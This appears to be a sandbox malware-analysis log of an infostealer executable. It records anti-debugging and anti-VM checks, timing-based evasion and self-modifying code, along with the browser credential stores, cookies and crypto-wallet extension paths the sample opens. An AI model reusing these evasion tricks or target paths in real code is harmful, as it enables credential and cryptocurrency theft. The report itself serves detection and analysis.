          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E88 second address: 5230E8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230E8E second address: 5230EBB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ecx 0x0000000b jmp 00007FE1C8D8FEC4h 0x00000010 mov dword ptr [ebp-04h], 55534552h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a movsx ebx, cx 0x0000001d popad 0x0000001e rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230EBB second address: 5230ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE1C8D96871h 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230EFD second address: 5230F01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5230F01 second address: 5230F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240ADB second address: 5240B67 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FE1C8D8FEC2h 0x00000008 sbb al, FFFFFF88h 0x0000000b jmp 00007FE1C8D8FEBBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FE1C8D8FEC6h 0x0000001a mov ebp, esp 0x0000001c jmp 00007FE1C8D8FEC0h 0x00000021 cmp dword ptr [75AB459Ch], 05h 0x00000028 jmp 00007FE1C8D8FEC0h 0x0000002d je 00007FE23959DD73h 0x00000033 jmp 00007FE1C8D8FEC0h 0x00000038 pop ebp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FE1C8D8FEBAh 0x00000042 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240B67 second address: 5240B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240B6B second address: 5240B71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240B71 second address: 5240B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240B9F second address: 5240BA5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240BA5 second address: 5240BA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240BA9 second address: 5240BD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 453238F1h 0x0000000d jmp 00007FE1C8D8FEBFh 0x00000012 xor dword ptr [esp], 3098A4D9h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240BD2 second address: 5240BED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D96877h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240BED second address: 5240BF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240BF2 second address: 5240C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, AFC8h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b call 00007FE2395AB7DBh 0x00000010 push 75A52B70h 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov eax, dword ptr [esp+10h] 0x00000020 mov dword ptr [esp+10h], ebp 0x00000024 lea ebp, dword ptr [esp+10h] 0x00000028 sub esp, eax 0x0000002a push ebx 0x0000002b push esi 0x0000002c push edi 0x0000002d mov eax, dword ptr [75AB4538h] 0x00000032 xor dword ptr [ebp-04h], eax 0x00000035 xor eax, ebp 0x00000037 push eax 0x00000038 mov dword ptr [ebp-18h], esp 0x0000003b push dword ptr [ebp-08h] 0x0000003e mov eax, dword ptr [ebp-04h] 0x00000041 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000048 mov dword ptr [ebp-08h], eax 0x0000004b lea eax, dword ptr [ebp-10h] 0x0000004e mov dword ptr fs:[00000000h], eax 0x00000054 ret 0x00000055 push eax 0x00000056 push edx 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240C08 second address: 5240C20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE1C8D8FEC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5240C20 second address: 5240C26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6BA10A instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 87E5C6 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 658DBE0 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 658DAEF instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 67285EC instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6726E10 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 673AD39 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 658DB94 instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 67BD7BE instructions caused by: Self-modifying code
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06591E85 rdtsc 0_2_06591E85
          Source: C:\Users\user\Desktop\file.exe TID: 7492Thread sleep time: -34017s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7652Thread sleep time: -180000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exe TID: 7472Thread sleep time: -30015s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
          Source: file.exe, file.exe, 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1722379838.0000000000839000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
          Source: file.exe, 00000000.00000002.1726915824.0000000005BA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}+
          Source: file.exe, 00000000.00000002.1727034793.0000000005C43000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
          Source: file.exe, 00000000.00000002.1723527128.00000000012F7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: file.exe, 00000000.00000002.1723527128.0000000001332000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBn
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
          Source: file.exe, 00000000.00000003.1386498805.0000000005BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696492231p
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
          Source: file.exe, 00000000.00000002.1724329843.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
          Source: file.exe, 00000000.00000002.1726915824.0000000005BA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\o
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
          Source: file.exe, 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1722379838.0000000000839000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
          Source: file.exe, 00000000.00000003.1386498805.0000000005BEC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
          Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
          Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
          Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SICE
          Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\file.exeCode function: 0_2_06591E85 rdtsc 0_2_06591E85
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
          Source: file.exe, file.exe, 00000000.00000002.1722379838.0000000000839000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
          Source: file.exe, file.exe, 00000000.00000002.1727821407.000000000670A000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: 9Program Manager
          Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: file.exe, 00000000.00000003.1461273838.0000000005BA4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1461600058.00000000013AB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1461488592.00000000013A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
          Source: file.exe, 00000000.00000003.1516364900.000000000137F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: amFiles%\Windows Defender\MsMpeng.exe
          Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
          Source: Yara matchFile source: Process Memory Space: file.exe PID: 7416, type: MEMORYSTR
          Source: file.exeString found in binary or memory: \??\C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
          Source: file.exe, 00000000.00000003.1432777993.000000000139D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Exodus
          Source: file.exeString found in binary or memory: %appdata%\Ethereum
          Source: file.exe, 00000000.00000003.1435855496.000000000138E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
          Source: file.exe, 00000000.00000003.1432777993.000000000139D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\formhistory.sqliteJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\prefs.jsJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
          Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
